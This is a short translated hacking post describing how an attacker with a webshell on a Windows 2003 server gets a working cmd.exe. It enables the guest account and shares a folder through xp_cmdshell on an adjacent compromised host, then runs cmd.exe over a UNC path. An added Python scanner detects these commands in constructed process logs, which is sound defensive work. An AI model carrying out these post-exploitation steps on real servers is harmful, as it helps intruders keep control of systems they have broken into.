Article author: pt007 (the article is very short, but hard to come by)
Recently, while attacking a Win2003 host, I found that by default the system's own cmd.exe could not be used to run system commands, and uploading a cmd.exe failed because the file was too big. I then uploaded cmd.exe successfully through a file share on a neighbouring machine. The specific process is as follows. We had already obtained administrator privileges on the adjacent machine 192.168.1.1, and used SQL Server's xp_cmdshell to run the following commands:

net user guest /active:yes (enables the guest account so that the file share allows anonymous access)
net share web=d:\web (shares the WEB directory)
Then, in the WEBSHELL on the target machine, enter the following in the shell path field: \\192.168.1.1\web\cmd.exe
Finally, set the SHELL path shown in the figure to the cmd.exe now under c:\, and system commands execute normally.
Since cmd.exe can be packed into an archive and uploaded to the server, I suggest that one of the experts write an ASP-based RAR decompression tool, to make uploading the cmd.exe program to 2003 servers easier.
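From the defender's side, the trick above leaves three traces in process-creation telemetry: a `net user ... /active:yes` enabling an account, a `net share` creating a new share, and a shell started from a UNC path by a server process. The following Python scanner is an added example, not code from pt007's post; it reads constructed records in the shape `parent|image|command_line` (the log format, the sample lines, and the process names w3wp.exe and sqlservr.exe for the IIS worker and the SQL Server service are all assumptions made for the example).

```python
"""Scan process-creation records for the indicators of the share-assisted cmd.exe
technique: account enabled, share created, UNC-path image, shell spawned by a server
process. Example code, not the original post's; sample records are constructed."""
import re
from collections import Counter
from dataclasses import dataclass

# Assumed process names for the IIS worker and the SQL Server service; a cmd.exe
# spawned by either (webshell or xp_cmdshell) is worth a closer look.
SERVER_PARENTS = {"w3wp.exe", "sqlservr.exe"}

# `net user <name> /active:yes` enables an account (the post enables "guest").
ACCOUNT_ENABLED = re.compile(r"\bnet\s+user\s+(\S+)\s+/active:yes\b", re.IGNORECASE)
# `net share <name>=<path>` publishes a directory as a share.
SHARE_CREATED = re.compile(r"\bnet\s+share\s+([^=\s]+)=(\S+)", re.IGNORECASE)

# Constructed sample records (parent|image|command_line); not real logs.
SAMPLE_LOG = r"""sqlservr.exe|cmd.exe|cmd.exe /c net user guest /active:yes
sqlservr.exe|cmd.exe|cmd.exe /c net share web=d:\web
w3wp.exe|\\192.168.1.1\web\cmd.exe|\\192.168.1.1\web\cmd.exe /c dir c:\
explorer.exe|notepad.exe|notepad.exe readme.txt
svchost.exe|cmd.exe|cmd.exe /c net user
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    line_no: int


def parse_record(line):
    """Split one 'parent|image|command_line' record; the command line may contain '|'."""
    parent, image, cmdline = line.split("|", 2)
    return parent.strip().lower(), image.strip(), cmdline.strip()


def scan(log_text):
    """Return every Finding triggered by the records in log_text, in record order."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        parent, image, cmdline = parse_record(line)

        match = ACCOUNT_ENABLED.search(cmdline)
        if match:
            findings.append(Finding("account_enabled", match.group(1).lower(), line_no))

        match = SHARE_CREATED.search(cmdline)
        if match:
            findings.append(Finding("share_created", f"{match.group(1)} -> {match.group(2)}", line_no))

        # An image path starting with "\\" is a UNC path: the binary lives on another host.
        if image.startswith("\\\\"):
            findings.append(Finding("unc_image", image, line_no))

        if parent in SERVER_PARENTS and image.lower().endswith("cmd.exe"):
            findings.append(Finding("shell_from_server_process", parent, line_no))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'account_enabled': 1, ...}."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
    print(summarize(scan(SAMPLE_LOG)))
```

Run as a script it prints one line per finding and the per-rule counts; the account-enabled and share-created rules fire on the exact commands the post issues through xp_cmdshell, and the UNC rule catches the `\\192.168.1.1\web\cmd.exe` launch from the webshell. In a real deployment the record parser would be swapped for the fields of whatever process-auditing source is in use.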